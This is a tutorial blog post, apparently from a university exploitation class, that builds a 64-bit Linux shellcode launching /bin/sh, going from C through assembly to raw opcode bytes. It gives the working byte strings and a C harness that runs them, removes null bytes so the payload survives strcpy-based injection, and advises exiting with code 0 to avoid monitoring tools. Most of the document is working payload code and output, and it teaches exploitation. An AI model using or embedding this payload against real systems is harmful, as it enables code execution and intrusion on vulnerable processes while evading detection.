Making a shellcode for 64-bit Linux
Spoiler: A quick return to the basics of software exploitation: making a shellcode on a 64-bit architecture.
The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.
For those unfamiliar with the term, a shellcode is a string of bytes containing machine code that can be executed directly on a machine. It depends on the target architecture, and also on the operating system it is intended for.
My slides then showed, as an example, the creation of a shellcode for Linux on a 32-bit architecture. The payload was the most classic of all: opening a command line.
And obviously, I was asked the following question: "What about 64 bits?"
Here is a short article to answer the question. It details the creation of a shellcode that launches /bin/sh on Linux with a 64-bit processor.
 
C code
If we were really good, we could of course write the shellcode directly in machine code. But few people speak opcode fluently, and even assembly (a slightly more readable rendering of the opcodes) is not a widely spoken language.
Tradition therefore has it that when we write a shellcode, we start with C code, which we translate into assembly, then into machine code.
Writing the code in C is optional, but has two advantages:
- it lets us define a target: what exactly is our code going to do?
- it gives us an executable that we can disassemble (translate into assembly), for example with gdb, to see how it is done.
 
Target
The following program launches a shell through execve. It will serve as our target: it does exactly what we want our shellcode to do.
#include <stdlib.h>   /* exit, NULL */
#include <unistd.h>   /* execve */
int main(void) {
    char *name[2];

    name[0] = "/bin/sh";   /* program to run, also used as argv[0] */
    name[1] = NULL;        /* argv must end with a NULL pointer */
    execve(name[0], name, NULL);
    exit(0);               /* only reached if execve failed */
}
When calling execve(), the system replaces the current process image with /bin/sh. If this succeeds, the instruction flow never comes back to our program and continues in the new one. If it fails, execution continues with the call to exit(0).
In a main like ours, the call to exit(0) is useless, since if execve failed the program would terminate naturally anyway.
But the purpose of a shellcode is to be injected into the memory of an attacked process and executed there (for example through a buffer overflow, but not only). As we have no certainty about the success of execve(), nor about the contents of memory after our shellcode, we prefer to force a quiet termination of the process with a call to exit() rather than let it run into whatever bytes happen to follow.
If we wanted to be clean, we would call exit(1). But as we generally do not want to attract the attention of monitoring tools with an error return code (a 1), we lie and say that everything is fine (with a 0).
Compilation
We compile with gcc, then run the binary and observe that we have indeed opened a shell.
arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode 
$ 
If you want to observe the disassembled code with gdb, I advise you to compile with the following options:
- -static compiles in static mode, so as not to depend on external libraries. It also lets us disassemble the code of execve, since it is then included in our binary,
- -ggdb gives gdb more information, such as function names,
- -fno-stack-protector removes the protection against buffer overflows set by default at compile time by gcc. On the one hand, we don't care whether our shellcode is protected against buffer overflows; on the other hand, the protection adds to the assembly code we obtain, and we want to get to the essentials.
Going through assembly
Now that we know where we are going, we will write the assembly code corresponding to the C code.
We come up against two constraints:
- knowing the address of the string /bin/sh,
- getting rid of external libraries.
The /bin/sh string
It is not possible to know in advance the address of the string /bin/sh. We will therefore have to be cunning to recover it.
Conveniently, since we are on a 64-bit architecture, the whole string /bin/sh fits, in its hexadecimal form, in a single register. /bin/sh in hexadecimal gives 2f 62 69 6e 2f 73 68. As we are on a little-endian architecture, the first character must be the least significant byte, which gives 0x68732f6e69622f. Finally, since this is a C character string, we add the null character (0x00) at the end, so we store the value 0x0068732f6e69622f in a register.
We can then push this register onto the stack. The address of the string is then the value of the stack pointer (rsp).
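To convince ourselves that the value is right, here is a minimal sketch in C that packs the characters of a string into a 64-bit integer the way a little-endian processor reads them from memory. The helper pack_le64 is a name made up for this illustration; it is not part of any library.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pack up to 8 characters of s into a 64-bit value,
 * with s[0] as the least significant byte (little-endian layout).
 * Bytes that are not filled stay at 0x00. */
uint64_t pack_le64(const char *s) {
    uint64_t value = 0;
    size_t len = strlen(s);

    if (len > 8) {
        len = 8;   /* a 64-bit register holds 8 bytes at most */
    }
    for (size_t i = 0; i < len; i++) {
        value |= (uint64_t)(unsigned char)s[i] << (8 * i);
    }
    return value;
}
```

Called as pack_le64("/bin/sh"), it returns 0x0068732f6e69622f: the seven characters fill the low bytes, and the untouched high byte plays the role of the terminating 0x00.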
Execve
The second constraint is that we must free ourselves from any external library, because we cannot be sure they are present. We therefore have to go to the source of the calls, in our case execve and exit.
The execve function is rather special: it asks the operating system to perform a process control task. As our user process cannot do this by itself, we have to make a system call.
A quick look in the system call table of the Linux kernel tells us that execve corresponds to system call number 59, i.e. 0x3b in hexadecimal.
By convention, when making a system call on Linux x86-64, the parameters are passed in registers in the following order: rdi, rsi, rdx, r10, r8, r9. (Ordinary function calls use rcx as their fourth register, but the syscall instruction overwrites rcx, so the kernel interface uses r10 instead.)
Likewise, by convention, the system call number must be in the rax register. The system call is then made with the assembly instruction syscall. So we need to put the address of /bin/sh in the rdi register, the address of an array holding the address of /bin/sh followed by a null pointer in the rsi register, and 0 in the rdx register. We also need 0x3b in the rax register.
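Which translates into assembly as:
    mov    $0x3b, %rax                  # rax = 59, the execve syscall number
    mov    $0x0,  %rdx                  # rdx = envp = NULL
    movabs $0x0068732f6e69622f,%r8      # r8 = "/bin/sh\0" (little-endian)
    push   %r8                          # the string now lives on the stack
    mov    %rsp,  %rdi                  # rdi = address of the string
    push   %rdx                         # argv[1] = NULL
    push   %rdi                         # argv[0] = address of the string
    mov    %rsp,  %rsi                  # rsi = argv
    syscall                             # execve("/bin/sh", argv, NULL)
    mov    $0x3c, %rax                  # only reached if execve failed:
    mov    $0x0,  %rdi                  # exit(0)
    syscall
Exit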
As before, exit is a system call. It therefore works in the same way as execve: its only parameter goes in the rdi register, and its number (60, i.e. 0x3c) must be in the rax register.
Its assembly code will therefore be:
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall
If you want to use gdb to disassemble exit and observe its code, you will find it tedious: exit calls __run_exit_handlers, which itself does a lot of things before calling _exit, which ends up making the syscall with 0x3c in the rax register.
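Both numbers can be cross-checked from C without opening the kernel table. The sketch below assumes a Linux system with glibc, whose <sys/syscall.h> exposes the SYS_* constants and whose syscall() function loads the number and the arguments into the right registers for us. The three function names are invented for the example.

```c
#define _GNU_SOURCE        /* makes syscall() visible in <unistd.h> on glibc */
#include <stddef.h>        /* NULL */
#include <sys/syscall.h>   /* SYS_execve, SYS_exit, SYS_getpid */
#include <unistd.h>        /* syscall(), getpid() */

/* 1 if the headers agree with the numbers quoted in the article,
 * 0 if they do not, -1 if the check does not apply (not x86-64). */
int syscall_numbers_match(void) {
#if defined(__x86_64__)
    return (SYS_execve == 0x3b && SYS_exit == 0x3c) ? 1 : 0;
#else
    return -1;   /* other architectures use a different numbering */
#endif
}

/* Harmless demonstration of the mechanism: ask for our pid by syscall
 * number and compare with the regular libc wrapper. */
int raw_getpid_agrees(void) {
    return syscall(SYS_getpid) == (long)getpid();
}

/* The same two requests as our assembly: execve("/bin/sh", argv, NULL),
 * then exit(0) if execve came back (which means it failed). */
void spawn_shell_raw(void) {
    char *argv[] = { "/bin/sh", NULL };

    syscall(SYS_execve, argv[0], argv, NULL);
    syscall(SYS_exit, 0L);
}
```

spawn_shell_raw() still goes through libc's syscall() helper, so it is not a shellcode, but it issues exactly the two requests that our assembly makes by hand. The other two functions are only checks and have no side effect.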
Final code
Now that we have all the pieces, we can put them together and write the complete program in assembly language. To make it easier, we add the few decorations needed to get a standalone asm file:
.section .text
.globl _start
_start:
    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8                    
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall
We convert it to object code with as, then generate an executable file with ld.
Since we are not using any external library, ld will just add some "decoration", that is, the header, the entry point, and not much more ...
arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$ 
Opcode
Now that we have our assembly code, we can finally switch to machine code. Each instruction must be translated into machine code, a sequence of 0s and 1s that the processor understands. You can use the Intel documentation for this.
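To give an idea of what this manual translation looks like, here is a small sketch that takes apart the seven bytes 48 c7 c0 3b 00 00 00, which is how mov $0x3b,%rax is encoded: a REX.W prefix (0x48), the opcode 0xc7, a ModRM byte that selects the register, then a 32-bit little-endian immediate. The helper names are assumptions made for this illustration, and the sketch only covers this one instruction form.

```c
#include <stdint.h>

/* Encoding of: mov $0x3b,%rax */
const uint8_t mov_rax_bytes[7] = { 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00 };

/* A REX prefix is 0100WRXB; the W bit (0x08) selects 64-bit operands. */
int has_rex_w(uint8_t prefix) {
    return (prefix & 0xf0) == 0x40 && (prefix & 0x08) != 0;
}

/* The three fields of a ModRM byte: mod (bits 7-6), reg (5-3), rm (2-0). */
unsigned modrm_mod(uint8_t b) { return (b >> 6) & 0x3; }
unsigned modrm_reg(uint8_t b) { return (b >> 3) & 0x7; }
unsigned modrm_rm(uint8_t b)  { return b & 0x7; }

/* Read a 32-bit immediate stored least significant byte first. */
uint32_t read_imm32(const uint8_t *p) {
    return (uint32_t)p[0]
         | (uint32_t)p[1] << 8
         | (uint32_t)p[2] << 16
         | (uint32_t)p[3] << 24;
}
```

For the ModRM byte 0xc0, mod is 3 (the operand is a register) and rm is 0, which is the number of rax. With 0xc2 and 0xc7 the rm field becomes 2 (rdx) and 7 (rdi). The immediate read at offset 3 is 0x3b, and its three upper bytes are the 0x00 bytes visible in the encoding.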
 
But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us ...
objdump is a command-line program for displaying various information about object files. The option we are interested in is -d, which disassembles. Each instruction is shown on its own line, which begins with its offset, then its bytes in hexadecimal, and finally its assembly code.
arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
 0: 48 c7 c0 3b 00 00 00 mov    $0x3b,%rax
 7: 48 c7 c2 00 00 00 00 mov    $0x0,%rdx
 e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00 
18: 41 50                push   %r8
1a: 48 89 e7             mov    %rsp,%rdi
1d: 52                   push   %rdx
1e: 57                   push   %rdi
1f: 48 89 e6             mov    %rsp,%rsi
22: 0f 05                syscall 
24: 48 c7 c0 3c 00 00 00 mov    $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov    $0x0,%rdi
32: 0f 05                syscall 
We extract the hexadecimal bytes. This is our shellcode.
\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05
We can then test our shellcode. For that, we will use a small C program. By declaring a function pointer and giving it the address of the shellcode as its value, we can execute it:
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    unsigned char code[] =
     "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
     "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
     "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
     "\x41\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
     "\x00\x00\x00\x48\xc7\xc7\x00\x00"
     "\x00\x00\x0f\x05";
    
    int (*ret)() = (int(*)())code;
    ret();
}
To compile, you must use the following options:
- -fno-stack-protector to remove the stack protection automatically set by gcc,
- -z execstack to mark the program as allowing an executable stack.
arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop 
$ exit
You may also need to install the execstack package.
And there you go! Our shellcode works!
Removing 0x00
Our shellcode is still far from ready for real-world use.
The 0x00 bytes it contains can cause it to be truncated when it is copied by a function like strcpy, which stops at the first null byte.
An alternative must therefore be found for each problematic instruction.
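The truncation is easy to reproduce. The sketch below uses the seven bytes of the first instruction of our shellcode (mov $0x3b,%rax) and measures how much of it survives a strcpy. The function and variable names are made up for the example.

```c
#include <stddef.h>
#include <string.h>

/* First instruction of the shellcode: mov $0x3b,%rax */
const unsigned char mov_rax_3b[] = { 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00 };

/* Offset of the first 0x00 byte in code[0..len), or len if there is none. */
size_t first_nul_offset(const unsigned char *code, size_t len) {
    const unsigned char *hit = memchr(code, 0x00, len);
    return hit ? (size_t)(hit - code) : len;
}

/* Copy code with strcpy, as a vulnerable program might, and report how
 * many payload bytes reached the destination. */
size_t bytes_surviving_strcpy(const unsigned char *code, size_t len) {
    char dest[64];
    size_t nul = first_nul_offset(code, len);

    if (nul == len || nul >= sizeof dest) {
        /* No 0x00 inside the buffer, or too long for this demo buffer:
         * skip the copy rather than overflow dest ourselves. */
        return nul;
    }
    strcpy(dest, (const char *)code);   /* stops at the first 0x00 */
    return strlen(dest);
}
```

Both functions return 4 for mov_rax_3b: only 48 c7 c0 3b would reach the target, and everything after it would be lost.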
A mov instruction whose encoding contains 0x00 bytes can be replaced by a push followed by a pop.
In our case, mov $0x3b,%rax and mov $0x3c,%rax are problematic and can be replaced by
    push $0x3b
    pop %rax
and
    push $0x3c
    pop %rax
An instruction putting 0x00 in a register can be replaced by an xor of the register with itself.
We therefore perform a first replacement:
#   mov    $0x0,%rdx
    xor    %rdx,%rdx
And a second:
#   mov    $0x0,%rdi
    xor    %rdi,%rdi
Finally, our string itself ends with a \0. To avoid this, we use the string //bin/sh, which fills all eight bytes of the r8 register, then shift the register right by 8 bits. This drops the extra leading / and puts a 0 at the end of the string.
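The arithmetic behind this trick can be checked with a few lines of C. This is only a sketch: shr8 mimics what shr $0x8 does to a 64-bit register, and has_no_zero_byte is a helper invented here to inspect the immediate value.

```c
#include <stdint.h>

/* Logical right shift by one byte, like shr $0x8 on a 64-bit register:
 * the lowest byte is dropped and the highest byte becomes 0x00. */
uint64_t shr8(uint64_t reg) {
    return reg >> 8;
}

/* 1 if none of the 8 bytes of value is 0x00, 0 otherwise. */
int has_no_zero_byte(uint64_t value) {
    for (int i = 0; i < 8; i++) {
        if (((value >> (8 * i)) & 0xff) == 0) {
            return 0;
        }
    }
    return 1;
}
```

The immediate 0x68732f6e69622f2f ("//bin/sh") passes has_no_zero_byte, whereas 0x0068732f6e69622f does not, and shr8 turns the first into the second.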
In our case, movabs $0x0068732f6e69622f,%r8 is replaced by
#   movabs $0x0068732f6e69622f,%r8
    movabs $0x68732f6e69622f2f,%r8
    shr    $0x8,               %r8
Our final assembly code will therefore be:
.section .text
.globl _start
_start:
    push $0x3b                        # rax = 59 (execve), without 0x00 bytes
    pop %rax
    xor %rdx,%rdx                     # rdx = 0
    movabs $0x68732f6e69622f2f,%r8    # "//bin/sh"
    shr $0x8, %r8                     # "/bin/sh\0"
    push %r8
    mov %rsp, %rdi
    push %rdx
    push %rdi
    mov %rsp, %rsi
    syscall
    push $0x3c                        # rax = 60 (exit)
    pop %rax
    xor %rdi,%rdi                     # rdi = 0
    syscall
Using objdump, we check that there are no 0x00 bytes left:
arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
 0: 6a 3b                pushq  $0x3b
 2: 58                   pop    %rax
 3: 48 31 d2             xor    %rdx,%rdx
 6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
 d: 2f 73 68 
10: 49 c1 e8 08          shr    $0x8,%r8
14: 41 50                push   %r8
16: 48 89 e7             mov    %rsp,%rdi
19: 52                   push   %rdx
1a: 57                   push   %rdi
1b: 48 89 e6             mov    %rsp,%rsi
1e: 0f 05                syscall 
20: 6a 3c                pushq  $0x3c
22: 58                   pop    %rax
23: 48 31 ff             xor    %rdi,%rdi
26: 0f 05                syscall
We therefore have a shellcode from which the 0x00 bytes have been removed. We can test it in the same way as before, by inserting it in a C program.
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    
    unsigned char code[] =
     "\x6a\x3b\x58\x48\x31\xd2\x49"
     "\xb8\x2f\x2f\x62\x69\x6e\x2f"
     "\x73\x68\x49\xc1\xe8\x08\x41"
     "\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x6a\x3c\x58"
     "\x48\x31\xff\x0f\x05";
    
    int (*ret)() = (int(*)())code;
    ret();
}
We compile and run it:
arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2 
$ exit
What next?
You can use this method to create your own shellcodes. It can of course be adapted to 32-bit Linux, or even to Windows, and the principle can be reused to do more than just launch a shell ...